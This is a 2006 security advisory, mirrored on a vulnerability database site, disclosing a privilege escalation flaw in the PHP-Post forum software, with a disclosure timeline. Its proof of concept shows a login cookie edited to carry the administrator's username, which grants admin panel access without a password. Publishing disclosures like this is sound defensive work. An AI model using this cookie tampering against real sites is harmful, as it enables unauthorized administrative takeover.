Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13568
HistoryJul 24, 2006 - 12:00 a.m.

[KAPDA::#52] - PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability

2006-07-2400:00:00
vulners.com
20
JSON

[KAPDA::#52] - PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability

KAPDA New advisory

Vulnerable product: Tested on PHP-Post 0.21 and 1.0
Vendor: http://php-post.co.uk
Vulnerability: Privilege Escalation

Date:

Found: Nov 23, 2005
Vendor Contacted: Jun 01, 2006
Release Date: July 18, 2006

About PHP-Post:

Free, full featured php+mysql Forum Management System.

Vulnerability:

Privilege Escalation:
PHP-Post contains a flaw that may allow a remote attacker to gain administrative privileges.
PHP-Post doesn't properly authenticate remote users if auto login is on!
By editing the values of the cookie, an attacker can change their privilege from a regular user to administrator and submit it back to the site.

Proof of Concepts:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

change to:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

refresh the site, go to the admin`s panel without password ;)

Solution:

No special patch is yet released by vendor but the vendor's website was patched!

Jun 01, 2006: vendor contacted
Jun 03, 2006: vendor replied

  • July 18, 2006: public release

Original Advisory:

http://www.kapda.ir/advisory-380.html

Credit:

FarhadKey of KAPDA
farhadkey [at} kapda <d0t> net
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir

JSON